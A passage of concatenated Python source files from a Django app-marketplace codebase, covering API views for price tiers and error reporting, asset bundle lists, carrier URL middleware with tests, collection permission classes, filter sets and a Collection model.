        carrier = CARRIER_MAP.get(self.kwargs['pk'])
        if carrier is None:
            raise Http404
        return carrier
@cors_api_view(['GET'])
@permission_classes([AllowAny])
def error_reporter(request):
    """
    Accept an error report from the client (Fireplace) and forward it to the
    configured Sentry DSN. Always responds 204 with no body on success.
    """
    request._request.CORS = ['GET']
    client = raven.base.Client(settings.SENTRY_DSN)
    # NOTE(review): sentry_data comes straight from the query string without
    # validation; a missing key raises KeyError and malformed JSON raises
    # ValueError -- confirm upstream error handling is acceptable.
    error_data = json.loads(request.GET['sentry_data'])
    client.capture('raven.events.Exception', data=error_data)
    return Response(status=204)
class RefreshManifestViewSet(GenericViewSet, CORSMixin):
    """POST-only endpoint letting an app owner force a manifest re-fetch.
    Only valid for hosted apps; packaged apps have no remote manifest."""
    model = Webapp
    permission_classes = [AllowAppOwner]
    cors_allowed_methods = ('post',)
    slug_lookup = 'app_slug'
    def detail_post(self, request, **kwargs):
        obj = self.get_object()
        self.check_object_permissions(request, obj)
        if obj.is_packaged:
            # Packaged apps carry their manifest inside the package.
            return Response(
                status=400,
                data={'reason': 'App is a packaged app.'})
        # Second arg forces the refetch; third is extra kwargs -- presumably
        # task options; confirm against _update_manifest's signature.
        _update_manifest(obj.pk, True, {})
        return Response(status=204)
class EnumeratedField(ChoiceField):
    """
    ChoiceField variant that serializes using the human-readable half of each
    (key, value) choice pair and deserializes back to the stored key.
    Both directions yield None when nothing matches, just like the original
    linear scan falling off the end of the loop.
    """
    def from_native(self, value):
        # Display value -> stored key.
        return next((k for k, v in self.choices if v == value), None)
    def to_native(self, key):
        # Stored key -> display value.
        return next((v for k, v in self.choices if k == key), None)
class PriceTierSerializer(ModelSerializer):
    """Serializes a Price (tier), exposing the payment method as its
    human-readable label via EnumeratedField."""
    resource_uri = HyperlinkedIdentityField(view_name='price-tier-detail')
    active = BooleanField()
    name = CharField()
    method = EnumeratedField(PAYMENT_METHOD_CHOICES)
    price = DecimalField()
    class Meta:
        model = Price
        fields = ['resource_uri', 'active', 'name', 'method', 'price']
class PriceTierViewSet(generics.CreateAPIView,
                       generics.RetrieveUpdateDestroyAPIView,
                       ModelViewSet):
    """Full CRUD on price tiers, restricted to the Prices:Edit group.
    NOTE(review): mixing generic views into a ModelViewSet is unusual;
    presumably kept for route generation -- confirm before simplifying."""
    permission_classes = [GroupPermission('Prices', 'Edit')]
    authentication_classes = [RestOAuthAuthentication]
    serializer_class = PriceTierSerializer
    model = Price
class PriceCurrencySerializer(ModelSerializer):
    """Serializes a PriceCurrency: a per-region/carrier/provider price point
    attached to a tier, with enum fields rendered as their labels."""
    resource_uri = HyperlinkedIdentityField(view_name='price-currency-detail')
    tier = HyperlinkedRelatedField(view_name='price-tier-detail')
    currency = ChoiceField(choices=ALL_CURRENCIES.items())
    carrier = CharField(required=False)
    price = DecimalField()
    provider = EnumeratedField(PROVIDER_CHOICES)
    method = EnumeratedField(PAYMENT_METHOD_CHOICES)
    region = SlugChoiceField(choices_dict=dict(REGIONS_CHOICES_SLUG))
    paid = BooleanField()
    dev = BooleanField()
    class Meta:
        model = PriceCurrency
        fields = ['carrier', 'currency', 'dev', 'method', 'paid', 'price',
                  'provider', 'region', 'resource_uri', 'tier']
class PriceCurrencyViewSet(ModelViewSet):
    """Full CRUD on PriceCurrency rows, restricted to the Prices:Edit group;
    creations/updates/deletions are audit-logged."""
    permission_classes = [GroupPermission('Prices', 'Edit')]
    authentication_classes = [RestOAuthAuthentication]
    serializer_class = PriceCurrencySerializer
    model = PriceCurrency
    filter_fields = ('tier', 'provider', 'currency', 'price')
    def post_save(self, obj, created):
        # Audit trail for price changes.
        log.info('Price %s %s.' % (obj, 'created' if created else 'updated'))
    def destroy(self, request, *args, **kwargs):
        # Overridden to log the deletion; responds 204 with no body.
        obj = self.get_object()
        obj.delete()
        log.info('Price %s deleted.' % (obj,))
        return Response(status=204)
class EndpointRemoved(APIView):
    """
    View that always returns a 404.
    To be used when API endpoints are removed in newer versions of the API.
    """
    def dispatch(self, request, *args, **kwargs):
        # Raise before any method routing so every HTTP verb 404s.
        raise Http404
# CSRF-exempt callable used directly in urlconfs (see mkt.api.v2.urls).
endpoint_removed = csrf_exempt(EndpointRemoved.as_view())
########NEW FILE########
__FILENAME__ = asset_bundles
# A list of our CSS and JS assets for jingo-minify.
# CSS bundles, keyed by bundle name, consumed by jingo-minify. Entry order is
# load order. `.styl` files are Stylus; see less2stylus() below for swapping
# in `.styl` twins of any remaining `.less` entries.
CSS = {
    'mkt/devreg': (
        # Contains reset, clearfix, etc.
        'css/devreg/base.css',
        # Base styles (body, breadcrumbs, islands, columns).
        'css/devreg/base.styl',
        'css/devreg/breadcrumbs.styl',
        # Typographical styles (font treatments, headings).
        'css/devreg/typography.styl',
        # Header (aux-nav, masthead, site-nav).
        'css/devreg/desktop-account-links.styl',
        'css/devreg/header.styl',
        # Item rows (used on Dashboard).
        'css/devreg/listing.styl',
        'css/devreg/legacy-paginator.styl',
        # Buttons (used for paginator, "Edit" buttons, Refunds page).
        'css/devreg/buttons.styl',
        # Popups, Modals, Tooltips.
        'css/devreg/notification.styl',
        'css/devreg/overlay.styl',
        'css/devreg/popups.styl',
        'css/devreg/device.styl',
        'css/devreg/tooltips.styl',
        # L10n menu ("Localize for ...").
        'css/devreg/l10n.styl',
        # Forms (used for tables on "Manage ..." pages).
        'css/devreg/forms.styl',
        # Tables.
        'css/devreg/data-grid.styl',
        # Landing page
        'css/devreg/landing.styl',
        # "Manage ..." pages.
        'css/devreg/manage.styl',
        'css/devreg/prose.styl',
        'css/devreg/authors.styl',
        'css/devreg/in-app-config.styl',
        'css/devreg/payments.styl',
        'css/devreg/refunds.styl',
        'css/devreg/transactions.styl',
        'css/devreg/status.styl',
        'css/devreg/content_ratings.styl',
        # Image Uploads (used for "Edit Listing" Images and Submission).
        'css/devreg/media.styl',
        'css/devreg/invisible-upload.styl',
        # Submission.
        'css/devreg/submit-progress.styl',
        'css/devreg/submit-terms.styl',
        'css/devreg/submit-manifest.styl',
        'css/devreg/submit-details.styl',
        'css/devreg/validation.styl',
        'css/devreg/submit.styl',
        'css/devreg/tabs.styl',
        # Developer Log In / Registration.
        'css/devreg/login.styl',
        # Footer.
        'css/devreg/footer.styl',
    ),
    'mkt/reviewers': (
        'css/zamboni/editors.styl',
        'css/devreg/consumer-buttons.styl',
        'css/devreg/content_ratings.styl',
        'css/devreg/data-grid.styl',
        'css/devreg/manifest.styl',
        'css/devreg/reviewers.styl',
        'css/devreg/reviewers-header.styl',
        'css/devreg/reviewers-mobile.styl',
        'css/devreg/legacy-paginator.styl',
        'css/devreg/files.styl',
    ),
    'mkt/ecosystem': (
        'css/devreg/reset.styl',
        'css/devreg/consumer-typography.styl',
        'css/devreg/login.styl',
        'css/devreg/forms.styl',
        'css/ecosystem/landing.styl',
        'css/ecosystem/documentation.styl',
    ),
    'mkt/in-app-payments': (
        'css/devreg/reset.styl',
        'css/devreg/consumer-typography.styl',
        'css/devreg/buttons.styl',
        'css/devreg/in-app-payments.styl',
    ),
    'mkt/in-app-products': (
        'css/devreg/in-app-products.styl',
    ),
    'mkt/lookup': (
        'css/devreg/manifest.styl',
        'css/devreg/lookup-tool.styl',
        'css/devreg/activity.styl',
    ),
    'mkt/gaia': (
        # Gaia building blocks.
        'css/gaia/action_menu.css',
        'css/gaia/switches.css',
        'css/gaia/value_selector.css',
    ),
    'mkt/operators': (
        'css/devreg/legacy-paginator.styl',
        'css/devreg/data-grid.styl',
        'css/devreg/operators.styl',
    ),
}
# JS bundles, keyed by bundle name, consumed by jingo-minify. Entry order is
# load order; see jquery_migrated() for inserting jquery-migrate after jQuery.
JS = {
    'mkt/devreg': (
        # tiny module loader
        'js/lib/amd.js',
        'js/lib/jquery-1.9.1.js',
        'js/lib/underscore.js',
        'js/lib/format.js',
        'js/lib/jquery.cookie.js',
        'js/lib/stick.js',
        'js/lib/csrf.js',
        'js/common/fakefilefield.js',
        'js/devreg/gettext.js',
        'js/devreg/tracking.js',
        'js/devreg/init.js',  # This one excludes buttons initialization, etc.
        'js/devreg/modal.js',
        'js/devreg/overlay.js',
        'js/devreg/capabilities.js',
        'js/devreg/slugify.js',
        'js/devreg/formdata.js',
        'js/devreg/tooltip.js',
        'js/devreg/popup.js',
        'js/devreg/login.js',
        'js/devreg/notification.js',
        'js/devreg/outgoing_links.js',
        'js/devreg/utils.js',
        'js/impala/serializers.js',
        'js/common/keys.js',
        'js/common/upload-base.js',
        'js/common/upload-packaged-app.js',
        'js/common/upload-image.js',
        'js/devreg/l10n.js',
        # jQuery UI
        'js/lib/jquery-ui/jquery-ui-1.10.1.custom.js',
        'js/lib/jquery.minicolors.js',
        'js/devreg/devhub.js',
        'js/devreg/submit.js',
        'js/devreg/tabs.js',
        'js/devreg/edit.js',
        'js/devreg/validator.js',
        # Specific stuff for making payments nicer.
        'js/devreg/payments-enroll.js',
        'js/devreg/payments-manage.js',
        'js/devreg/payments.js',
        # For testing installs.
        'js/devreg/apps.js',
        'js/devreg/test-install.js',
        'js/devreg/tracking_app_submit.js',
        # IARC.
        'js/devreg/content_ratings.js',
        # Module initialization.
        'js/devreg/devreg_init.js',
    ),
    'mkt/reviewers': (
        'js/lib/moment-with-langs.min.js',  # JS date lib.
        'js/zamboni/storage.js',  # Used by editors.js
        'js/common/buckets.js',
        'js/devreg/reviewers/editors.js',
        'js/devreg/apps.js',  # Used by install.js
        'js/devreg/reviewers/payments.js',
        'js/devreg/reviewers/install.js',
        'js/devreg/reviewers/buttons.js',
        'js/devreg/manifest.js',  # Used by reviewers.js
        'js/devreg/reviewers/reviewers_commbadge.js',
        'js/devreg/reviewers/reviewers.js',
        'js/devreg/reviewers/expandable.js',
        'js/devreg/reviewers/mobile_review_actions.js',
        'js/common/fakefilefield.js',
        'js/common/formsets.js',  # TODO: Not used? Only seen in devreg/init.js
        'js/devreg/reviewers/reviewers_init.js',
    ),
    'mkt/in-app-payments': (
        'js/lib/jquery-1.9.1.js',
        'js/devreg/inapp_payments.js',
        'js/lib/csrf.js',
        'js/impala/serializers.js',
        'js/devreg/login.js',
    ),
    'mkt/in-app-products': (
        'js/lib/es5-shim.min.js',  # We might already assume these work.
        'js/lib/flight.min.js',
        'js/devreg/in_app_products.js',
    ),
    'mkt/lookup': (
        'js/common/keys.js',
        'js/impala/ajaxcache.js',
        'js/devreg/suggestions.js',
        'js/devreg/manifest.js',
        'js/devreg/lookup-tool.js',
    ),
    'mkt/ecosystem': (
        'js/devreg/ecosystem.js',
    ),
    'mkt/debug': (
        'js/debug/tinytools.js',
    ),
}
def jquery_migrated():
    """Return a copy of the JS bundles with jquery-migrate injected.

    For every bundle that ships jQuery 1.9.1, jquery-migrate is inserted
    immediately after it, before any file that depends on jQuery gets
    loaded. Bundles without jQuery are returned untouched.
    """
    bundles = dict(JS)
    for name, file_list in bundles.items():
        file_list = list(file_list)
        if 'js/lib/jquery-1.9.1.js' not in file_list:
            continue
        position = file_list.index('js/lib/jquery-1.9.1.js')
        # Insert jquery-migrate right after jquery itself.
        file_list.insert(position + 1, 'js/lib/jquery-migrate-1.1.0.js')
        bundles[name] = tuple(file_list)
    return bundles
def less2stylus():
    """Return the CSS bundles with `.styl` stylesheets swapped in.

    Each `.less` file that has a `.styl` counterpart on disk under
    `media/` is replaced by the `.styl` path; everything else is kept.

    Put in your local settings::

        try:
            MINIFY_BUNDLES['css'].update(asset_bundles.less2stylus())
        except AttributeError:
            pass
    """
    import os
    root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

    def prefer_stylus(path):
        # Swap the extension, but only keep it if the file really exists.
        candidate = path.replace('.less', '.styl')
        if os.path.exists(os.path.join(root, 'media', candidate)):
            return candidate
        return path

    return dict((bundle, tuple(prefer_stylus(f) for f in files))
                for bundle, files in CSS.iteritems())
########NEW FILE########
__FILENAME__ = carriers
from threading import local
import mkt.constants.carriers
from mkt.constants.carriers import CARRIERS
__all__ = ['get_carrier', 'get_carrier_id', 'set_carrier']
_local = local()
def get_carrier():
    """Return the carrier slug (e.g. 'telefonica') for the current
    request lifecycle, or None when no carrier is active.
    """
    try:
        return _local.carrier
    except AttributeError:
        return None
def get_carrier_id():
    """Return the numeric carrier ID for the request lifecycle.

    None when no carrier is set; UNKNOWN_CARRIER's id when the current
    slug does not match any known carrier.
    """
    slug = get_carrier()
    if slug is None:
        return None
    return next((c.id for c in CARRIERS if c.slug == slug),
                mkt.constants.carriers.UNKNOWN_CARRIER.id)
def set_carrier(name):
    """Remember *name* as the carrier for the current request lifecycle."""
    setattr(_local, 'carrier', name)
class CarrierPrefixer:
    """Rewrites URL paths to carry a carrier slug prefix."""

    def __init__(self, request, carrier):
        self.request = request
        self.carrier = carrier

    def fix(self, path):
        """Return *path* rebuilt as SCRIPT_NAME/<carrier>/<path>."""
        script_name = self.request.META['SCRIPT_NAME']
        return '/'.join([script_name, self.carrier, path.lstrip('/')])
########NEW FILE########
__FILENAME__ = context_processors
from . import get_carrier
def carrier_data(request):
    """Context processor exposing the active carrier as CARRIER."""
    carrier = get_carrier()
    return {'CARRIER': carrier}
########NEW FILE########
__FILENAME__ = middleware
from django.shortcuts import redirect
from django.utils.cache import patch_vary_headers
from amo.helpers import urlparams
from amo.urlresolvers import set_url_prefix
from mkt.constants.carriers import CARRIER_MAP
from . import set_carrier
class CarrierURLMiddleware(object):
    """
    Supports pseudo-URL prefixes that define a custom carrier store.

    For example, if you browse the Marketplace at /telefonica/ then this
    middleware will:

    1. strip off the telefonica part so all other URLs work as expected;
    2. allow you to access 'telefonica' from mkt.carriers.get_carrier(); and
    3. set a prefix so that reverse('whatever') returns /telefonica/whatever.

    See bug 769421.
    """

    def process_request(self, request):
        # Reset any state left over from a previous request on this thread.
        set_url_prefix(None)
        set_carrier(None)
        # A valid carrier cookie is the starting point.
        stored = request.COOKIES.get('carrier')
        if stored not in CARRIER_MAP:
            stored = None
        carrier = stored
        # An explicit ?carrier= parameter wins over the cookie; a present
        # but invalid/empty value clears the carrier entirely.
        chosen = request.REQUEST.get('carrier')
        if chosen in CARRIER_MAP:
            carrier = chosen
        elif 'carrier' in request.GET:
            carrier = None
        # Refresh the cookie whenever the effective carrier changed.
        if carrier != stored:
            request.set_cookie('carrier', carrier)
        set_carrier(carrier)

    def process_response(self, request, response):
        # ?vary=0 lets callers opt out of the Vary header.
        wants_vary = request.REQUEST.get('vary') != '0'
        if wants_vary:
            patch_vary_headers(response, ['Accept-Language', 'Cookie'])
        return response
########NEW FILE########
__FILENAME__ = tests
from django.core.urlresolvers import reverse
import mock
from nose.tools import eq_
from test_utils import RequestFactory
from amo.tests import TestCase
from amo.urlresolvers import set_url_prefix
from . import get_carrier, set_carrier, context_processors
from .middleware import CarrierURLMiddleware
class TestCarrierURLs(TestCase):
    """Tests for CarrierURLMiddleware and the carriers context processor."""

    def setUp(self):
        # Reset the thread-local carrier / URL-prefix state between tests.
        set_carrier(None)
        set_url_prefix(None)

    def request(self, url):
        # Build a GET request with a mocked set_cookie so the middleware's
        # cookie writes can be asserted on.
        request = RequestFactory().get(url)
        # Simulate the RequestCookiesMiddleware.
        request.set_cookie = mock.Mock()
        return request

    def get(self, url, request=None):
        # Run a (possibly prepared) request through the middleware.
        if not request:
            request = self.request(url)
        CarrierURLMiddleware().process_request(request)
        return request

    def test_ignore_non_carriers(self):
        # Unknown prefixes are left alone and no cookie is written.
        request = self.get('/not-a-store')
        eq_(request.path_info, '/not-a-store')
        assert not request.set_cookie.called

    def test_set_carrier(self):
        request = self.get('/?carrier=telefonica')
        eq_(get_carrier(), 'telefonica')
        assert request.set_cookie.called

    def test_set_carrier_none(self):
        # An empty ?carrier= clears the carrier remembered in the cookie.
        request = self.request('/?carrier=')
        request.COOKIES = {'carrier': 'telefonica'}
        request = self.get('/?carrier=', request)
        eq_(get_carrier(), None)
        assert request.set_cookie.called

    def test_set_carrier_to_none_url(self):
        # Unknown carriers never stick, whether given as a URL prefix or a
        # query parameter.
        self.get('/telefonica/')
        self.get('/not-a-store')
        eq_(get_carrier(), None)
        self.get('/?carrier=telefonica')
        self.get('/?carrier=not-a-store')
        eq_(get_carrier(), None)

    def test_reverse(self):
        # reverse() must not keep a carrier prefix around.
        self.get('/telefonica/')
        eq_(reverse('manifest.webapp'), '/manifest.webapp')
        self.get('/?carrier=telefonica')
        eq_(reverse('manifest.webapp'), '/manifest.webapp')

    def test_context(self):
        request = self.get('/?carrier=telefonica')
        eq_(request.path_info, '/')
        ctx = context_processors.carrier_data(request)
        eq_(ctx['CARRIER'], 'telefonica')
########NEW FILE########
__FILENAME__ = authorization
from django.contrib.auth.models import AnonymousUser
from django.core.exceptions import ImproperlyConfigured
import commonware.log
from rest_framework.permissions import BasePermission, SAFE_METHODS
from access import acl
log = commonware.log.getLogger('mkt.collections')
class CuratorAuthorization(BasePermission):
    """
    Permission class governing ability to interact with Collection-related
    APIs.

    Rules:
    - All users may make GET, HEAD, OPTIONS requests.
    - Users with Collections:Curate may make any request.
    - Users in Collection().curators may make any request using a verb in
      the curator_verbs property.

    Note: rest-framework does not allow for situations where a user fails
    has_permission but passes has_object_permission, so the logic
    determining whether a user is a curator or has the Collections:Curate
    permission is abstracted from those methods and situationally called
    in each.
    """
    # Safe (read-only) verbs are open to everybody unless a subclass says
    # otherwise.
    allow_public_safe_requests = True
    curator_verbs = ['POST', 'PUT', 'PATCH']

    def is_public_safe_request(self, request):
        """True when anonymous read access applies to this request."""
        if not self.allow_public_safe_requests:
            return False
        return request.method in SAFE_METHODS

    def is_curator_for(self, request, obj):
        """True when the user curates *obj* and uses a curator verb."""
        user = request.user
        if isinstance(user, AnonymousUser):
            return False
        return obj.has_curator(user) and request.method in self.curator_verbs

    def has_curate_permission(self, request):
        """True when the user holds the global Collections:Curate perm."""
        return acl.action_allowed(request, 'Collections', 'Curate')

    def has_permission(self, request, view):
        if self.is_public_safe_request(request):
            return True
        try:
            obj = view.get_object()
        except ImproperlyConfigured:
            # Non-object view (e.g. a list endpoint): only the global
            # permission can apply.
            return self.has_curate_permission(request)
        if self.has_curate_permission(request):
            return True
        return self.is_curator_for(request, obj)

    def has_object_permission(self, request, view, obj):
        if self.is_public_safe_request(request):
            return True
        if self.has_curate_permission(request):
            return True
        return self.is_curator_for(request, obj)
class StrictCuratorAuthorization(CuratorAuthorization):
    """
    The same as CuratorAuthorization, with GET / HEAD / OPTIONS requests
    disallowed for unauthorized users.
    """
    # Read access is no longer public...
    allow_public_safe_requests = False
    # ...so curators must be explicitly allowed to use the safe verbs too.
    curator_verbs = CuratorAuthorization.curator_verbs + SAFE_METHODS
class CanBeHeroAuthorization(BasePermission):
    """
    Only users with Collections:Curate can modify the can_be_hero field.
    """

    def has_curate_permission(self, request):
        """True when the user holds the Collections:Curate permission."""
        return CuratorAuthorization().has_curate_permission(request)

    def is_modifying_request(self, request):
        """True for verbs that can change an object."""
        return request.method in ('PUT', 'PATCH', 'POST',)

    def hero_field_modified(self, request):
        """True when the request carries a can_be_hero value."""
        method = request.method
        # Form-encoded POSTs expose the field through request.POST...
        if method == 'POST' and 'can_be_hero' in request.POST:
            return True
        # ...while parsed payloads land in request.DATA.
        if method in ('PATCH', 'POST', 'PUT'):
            if not isinstance(request.DATA, dict):
                return False
            return 'can_be_hero' in request.DATA
        return False

    def has_object_permission(self, request, view, obj):
        """
        Deny the request only when it attempts to modify can_be_hero
        without the Collections:Curate permission.
        """
        if self.has_curate_permission(request):
            return True
        if not self.is_modifying_request(request):
            return True
        return not self.hero_field_modified(request)
########NEW FILE########
__FILENAME__ = constants
from tower import ugettext_lazy as _lazy
# Collection type identifiers, stored in Collection.collection_type.
COLLECTIONS_TYPE_BASIC = 0
COLLECTIONS_TYPE_FEATURED = 1
COLLECTIONS_TYPE_OPERATOR = 2
# (id, localized label) choices for model/form fields.
COLLECTION_TYPES = (
    (COLLECTIONS_TYPE_BASIC, _lazy(u'Basic Collection')),
    (COLLECTIONS_TYPE_FEATURED, _lazy(u'Featured App List')),
    (COLLECTIONS_TYPE_OPERATOR, _lazy(u'Operator Shelf')),
)
########NEW FILE########
__FILENAME__ = fields
import re
from django.core import exceptions
from django.db.models.fields import CharField
from django.utils.translation import ugettext_lazy as _
class ColorField(CharField):
    """
    Model field that only accepts 7-character hexadecimal color
    representations, e.g. #FF0035.
    """
    description = _('Hexadecimal color')
    # Declared at class level so Django merges it into self.error_messages
    # for this field class only. The previous implementation called
    # self.default_error_messages.update(...) in __init__, which mutated
    # the dict shared with the base Field class and leaked 'bad_hex' into
    # every other field type in the process.
    default_error_messages = {
        'bad_hex': _('Must be a valid hex color code, e.g. #FF0035.'),
    }

    def __init__(self, *args, **kwargs):
        # '#RRGGBB' is exactly 7 characters; callers may still override.
        kwargs['max_length'] = kwargs.get('max_length', 7)
        super(ColorField, self).__init__(*args, **kwargs)

    def validate(self, value, model_instance):
        """Raise ValidationError unless *value* looks like '#RRGGBB'.

        Empty values are accepted here. NOTE(review): super().validate()
        is intentionally not called (matching the original behavior), so
        choices/null checks from CharField are skipped.
        """
        if value and not re.match(r'^#([0-9a-fA-F]{6})$', value):
            raise exceptions.ValidationError(self.error_messages['bad_hex'])
########NEW FILE########
__FILENAME__ = filters
from django import forms
from django.core.validators import EMPTY_VALUES
from django_filters.filters import ChoiceFilter, ModelChoiceFilter
from django_filters.filterset import FilterSet
import amo
import mkt
from addons.models import Category
from mkt.api.forms import SluggableModelChoiceField
from mkt.collections.models import Collection
class SlugChoiceFilter(ChoiceFilter):
    """
    ChoiceFilter that accepts the filtered value as either a slug or an
    id, translating slugs through `choices_dict` (slug -> constant object
    exposing `.id`).
    """
    def __init__(self, *args, **kwargs):
        self.choices_dict = kwargs.pop('choices_dict')
        # Create a choice dynamically to allow None, slugs and ids.
        slugs_choices = self.choices_dict.items()
        ids_choices = [(v.id, v) for v in self.choices_dict.values()]
        kwargs['choices'] = [(None, None)] + slugs_choices + ids_choices
        # Plain call, no `return`: __init__ must return None.
        super(SlugChoiceFilter, self).__init__(*args, **kwargs)

    def filter(self, qs, value):
        """Filter qs on self.name, translating slugs to ids first."""
        if value == '' or value is None:
            value = None
        elif not value.isdigit():
            # We are passed a slug, get the id by looking at the choices
            # dict, defaulting to None if no corresponding value is found.
            value = self.choices_dict.get(value, None)
            if value is not None:
                value = value.id
        return qs.filter(**{self.name: value})
class SlugModelChoiceFilter(ModelChoiceFilter):
    """ModelChoiceFilter whose form field resolves slugs to instances."""
    field_class = SluggableModelChoiceField

    def filter(self, qs, value):
        lookup = '%s__%s' % (self.name, self.lookup_type)
        return qs.filter(**{lookup: value})
class CollectionFilterSet(FilterSet):
    """Filters collections by carrier, region and category slug/id."""
    # Note: the filter names must match what ApiSearchForm and CategoryViewSet
    # are using.
    carrier = SlugChoiceFilter(name='carrier',
                               choices_dict=mkt.carriers.CARRIER_MAP)
    region = SlugChoiceFilter(name='region',
                              choices_dict=mkt.regions.REGION_LOOKUP)
    cat = SlugModelChoiceFilter(name='category',
        queryset=Category.objects.filter(type=amo.ADDON_WEBAPP),
        sluggable_to_field_name='slug',)

    class Meta:
        model = Collection
        # All fields are provided above, but django-filter needs Meta.field to
        # exist.
        fields = []

    def get_queryset(self):
        """
        Return the queryset to use for the filterset.

        Copied from django-filter qs property, modified to support filtering
        on 'empty' values, at the expense of multi-lookups like
        'x < 4 and x > 2'.
        """
        valid = self.is_bound and self.form.is_valid()
        if self.strict and self.is_bound and not valid:
            # Strict mode with invalid input: return nothing, but expose the
            # form errors on the (empty) queryset for callers to inspect.
            qs = self.queryset.none()
            qs.filter_errors = self.form.errors
            return qs
        # Start with all the results and filter from there.
        qs = self.queryset.all()
        for name, filter_ in self.filters.items():
            if valid:
                # Only apply filters that were actually submitted — this is
                # what allows explicit filtering on empty/None values.
                if name in self.form.data:
                    value = self.form.cleaned_data[name]
                else:
                    continue
            else:
                raw_value = self.form[name].value()
                try:
                    value = self.form.fields[name].clean(raw_value)
                except forms.ValidationError:
                    if self.strict:
                        return self.queryset.none()
                    else:
                        continue
            # At this point we should have valid & clean data.
            qs = filter_.filter(qs, value)
        # Optional ordering.
        if self._meta.order_by:
            order_field = self.form.fields[self.order_by_field]
            data = self.form[self.order_by_field].data
            ordered = None
            try:
                ordered = order_field.clean(data)
            except forms.ValidationError:
                pass
            if ordered in EMPTY_VALUES and self.strict:
                # Fall back to the first declared ordering choice.
                ordered = self.form.fields[self.order_by_field].choices[0][0]
            if ordered:
                qs = qs.order_by(*self.get_order_by(ordered))
        return qs

    @property
    def qs(self):
        # Cache the filtered queryset for the lifetime of the filterset.
        if hasattr(self, '_qs'):
            return self._qs
        self._qs = self.get_queryset()
        return self._qs
class CollectionFilterSetWithFallback(CollectionFilterSet):
    """
    FilterSet with a fallback mechanism, dropping filters in a certain order
    if no results are found.
    """
    # Combinations of fields to try to set to NULL, in order, when no results
    # are found. See `next_fallback()`.
    fields_fallback_order = (
        ('region',),
        ('carrier',),
        ('region', 'carrier',)
    )

    def next_fallback(self):
        """
        Yield the next set of filters to set to NULL when refiltering the
        queryset to find results. See `refilter_queryset()`.
        """
        for f in self.fields_fallback_order:
            yield f

    def refilter_queryset(self):
        """
        Reset self.data, then override fields yield by the `fallback`
        generator to NULL. Then recall the `qs` property and return it.

        When we are using this FilterSet, we really want to return something,
        even if it's less relevant to the original query. When the `qs`
        property is evaluated, if no results are found, it will call this
        method to refilter the queryset in order to find /something/.

        Can raise StopIteration if the fallback generator is exhausted.
        """
        self.data = self.original_data.copy()
        self.fields_to_null = next(self.fallback)
        for field in self.fields_to_null:
            if field in self.data:
                self.data[field] = None
        # Drop the cached bound form so it is rebuilt from the new data.
        del self._form
        return self.qs

    def __init__(self, *args, **kwargs):
        super(CollectionFilterSetWithFallback, self).__init__(*args, **kwargs)
        # Pristine copy of the incoming data, restored on each refilter pass.
        self.original_data = self.data.copy()
        self.fallback = self.next_fallback()
        self.fields_to_null = None

    @property
    def qs(self):
        if hasattr(self, '_qs'):
            return self._qs
        qs = self.get_queryset()
        if hasattr(qs, 'filter_errors'):
            # Immediately return if there was an error.
            self._qs = qs
            return self._qs
        elif not qs.exists():
            # No results: progressively null out filters (per
            # fields_fallback_order) until something comes back or the
            # fallback order is exhausted.
            try:
                qs = self.refilter_queryset()
            except StopIteration:
                pass
        self._qs = qs
        # Record which fields were nulled (None when no fallback was needed).
        self._qs.filter_fallback = self.fields_to_null
        return self._qs
########NEW FILE########
__FILENAME__ = managers
from amo.models import ManagerBase
class PublicCollectionsManager(ManagerBase):
    """Manager restricted to collections flagged as public."""

    def get_query_set(self):
        base_qs = super(PublicCollectionsManager, self).get_query_set()
        return base_qs.filter(is_public=True)
########NEW FILE########
__FILENAME__ = models
import os
from django.conf import settings
from django.db import models
import amo.models
import mkt.carriers
import mkt.regions
from addons.models import Addon, Category, clean_slug
from amo.decorators import use_master
from amo.models import SlugField
from amo.utils import to_language
from mkt.webapps.models import Webapp
from mkt.webapps.tasks import index_webapps
from translations.fields import PurifiedField, save_signal
from .constants import COLLECTION_TYPES
from .fields import ColorField
from .managers import PublicCollectionsManager
class Collection(amo.models.ModelBase):
    """A curated, ordered list of webapps (basic collection, featured app
    list or operator shelf — see constants.COLLECTION_TYPES)."""
    # `collection_type` for rocketfuel, not transonic.
    collection_type = models.IntegerField(choices=COLLECTION_TYPES)
    description = PurifiedField()
    name = PurifiedField()
    is_public = models.BooleanField(default=False)
    # FIXME: add better / composite indexes that matches the query we are
    # going to make.
    category = models.ForeignKey(Category, null=True, blank=True)
    region = models.PositiveIntegerField(default=None, null=True, blank=True,
        choices=mkt.regions.REGIONS_CHOICES_ID, db_index=True)
    carrier = models.IntegerField(default=None, null=True, blank=True,
        choices=mkt.carriers.CARRIER_CHOICES, db_index=True)
    author = models.CharField(max_length=255, default='', blank=True)
    slug = SlugField(blank=True, max_length=30,
                     help_text='Used in collection URLs.')
    default_language = models.CharField(max_length=10,
        choices=((to_language(lang), desc)
                 for lang, desc in settings.LANGUAGES.items()),
        default=to_language(settings.LANGUAGE_CODE))
    curators = models.ManyToManyField('users.UserProfile')
    background_color = ColorField(null=True)
    text_color = ColorField(null=True)
    # Short hash of the current image, used for cache-busting (see
    # has_image and the image serializers).
    image_hash = models.CharField(default=None, max_length=8, null=True)
    can_be_hero = models.BooleanField(default=False, help_text=(
        'Indicates whether an operator shelf collection can be displayed with'
        'a hero graphic'))
    # Apps are attached through CollectionMembership so they carry an order;
    # use apps() rather than _apps for anything user-facing.
    _apps = models.ManyToManyField(Webapp, through='CollectionMembership',
                                   related_name='app_collections')
    objects = amo.models.ManagerBase()
    public = PublicCollectionsManager()

    class Meta:
        db_table = 'app_collections'
        ordering = ('-id',)  # This will change soon since we'll need to be
                             # able to order collections themselves, but this
                             # helps tests for now.

    def __unicode__(self):
        return self.name.localized_string_clean

    def save(self, **kw):
        # Make sure the slug is always cleaned/unique before hitting the db.
        self.clean_slug()
        return super(Collection, self).save(**kw)

    @use_master
    def clean_slug(self):
        clean_slug(self, 'slug')

    @classmethod
    def get_fallback(cls):
        # Fallback locale field used by the translated (Purified) fields.
        return cls._meta.get_field('default_language')

    def image_path(self):
        # Images are bucketed by thousands of pks to keep directories small.
        return os.path.join(settings.COLLECTIONS_ICON_PATH,
                            str(self.pk / 1000),
                            'app_collection_%s.png' % (self.pk,))

    def apps(self):
        """
        Public apps on the collection, ordered by their position in the
        CollectionMembership model.

        Use this method every time you want to display apps for a collection
        to a user.
        """
        return self._apps.filter(disabled_by_user=False,
            status=amo.STATUS_PUBLIC).order_by('collectionmembership')

    def add_app(self, app, order=None):
        """
        Add an app to this collection. If specified, the app will be created
        with the specified `order`. If not, it will be added to the end of the
        collection.
        """
        qs = CollectionMembership.objects.filter(collection=self)
        if order is None:
